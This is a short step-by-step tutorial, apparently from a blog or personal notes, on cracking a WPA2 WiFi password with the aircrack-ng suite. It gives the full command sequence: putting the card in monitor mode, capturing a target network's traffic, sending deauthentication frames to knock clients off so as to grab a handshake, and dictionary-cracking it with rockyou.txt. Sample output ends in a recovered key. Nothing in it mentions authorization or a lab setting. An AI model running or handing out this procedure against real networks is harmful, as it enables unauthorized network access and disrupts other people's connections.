Install aircrack-ng from your package manager.
Ex: sudo apt install aircrack-ng
First get your network card name with
ip link
Here mine is wlan0
sudo airmon-ng start wlan0
Confirm that a wlan0mon
now shows up in ip link
.
If it didn't change to wlan0mon
, you can try running the following
command to kill network managers.
sudo airmon-ng check kill
And then try again.
Start your first scan with the following command:
sudo airodump-ng wlan0mon
Which will show something similar to this:
CH 14 ][ Elapsed: 0 s ][ 2022-09-27 18:47
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
12:34:56:78:90:AB 0 3 0 0 6 130 WPA2 CCMP PSK WIFI NAVN
BSSID STATION PWR Rate Lost Frames Notes Probes
12:34:56:78:90:AB DE:AD:F0:0D:12:34 -37 1e- 6e 0 4
We will refer back to this later!
We need to gather the following information in order to start listening for a handshake.
- Network BSSID (mac address)
- Network channel
Afterwards we put the data into the following command
sudo airodump-ng --bssid <bssid> -c <channel> -w <output_file> wlan0mon
We can get the data from the example, here the BSSID would be 12:34:56:78:90:AB
and the channel (CH column) is 6
. So the final command would be something like this:
sudo airodump-ng --bssid 12:34:56:78:90:AB -c 6 -w out wlan0mon
This should just run in the background until you see that a handshake has been captured in the top right.
For now, you can put this in the background while we start deauthing the network.
While listening in another window, open a new terminal, and start deauthing.
sudo aireplay-ng -0 2 -a <bssid> (-c <station>)
You can include a station if you want to. It will most likely make the deauth more successful.
sudo aireplay-ng -0 2 -a 12:34:56:78:90:AB -c DE:AD:F0:0D:12:34
Keep repeating this (and maybe physically move closer to the router) until you get a WPA handshake in the previous window.
Once you have the handshake, we just have to get cracking.
Find a wordlist (such as rockyou.txt) and then execute the following command:
aircrack-ng -w <wordlist> <output_file>-01.cap
Where <output-file>
is the file you specified in Start listening for a handshake.
Give this some time, and if the password was in the wordlist, it will have cracked the password:
Here is an example of that screen.
Aircrack-ng 1.7
[00:00:00] 891019/10303727 keys tested (2175.29 k/s)
Time left: 1 hour, 18 minutes, 56 seconds 0.00%
KEY FOUND! [ 13370420 ]
Master Key : DF 10 44 52 7C 59 22 F3 67 DC 83 0D CF 92 05 AE
23 81 70 A1 96 1C 4E F7 98 2A D2 F5 50 1D E9 CE
Transient Key : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Here the WiFi password is 13370420